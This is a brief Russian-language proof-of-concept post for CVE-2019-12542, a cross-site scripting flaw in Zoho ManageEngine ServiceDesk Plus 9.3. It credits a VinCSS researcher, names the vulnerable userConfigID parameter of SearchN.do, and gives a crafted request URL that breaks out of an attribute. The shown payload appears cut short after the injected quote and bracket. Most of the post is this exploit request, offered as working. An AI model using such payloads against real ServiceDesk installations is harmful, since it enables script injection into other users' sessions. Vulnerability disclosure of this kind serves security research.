
Доказательство концепции для CVE-2019-12542: XSS-уязвимость в Zoho ManageEngine ServiceDesk Plus 9.3 через параметр userConfigID в SearchN.do, с рабочим эксплойтом.
Информация и описание: В Zoho ManageEngine ServiceDesk Plus 9.3 обнаружена проблема. Существует XSS-уязвимость через параметр userConfigID в SearchN.do.
Автор: Concobe из Tarantula Team - VinCSS (член Vingroup)
domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=1">&selectName=Site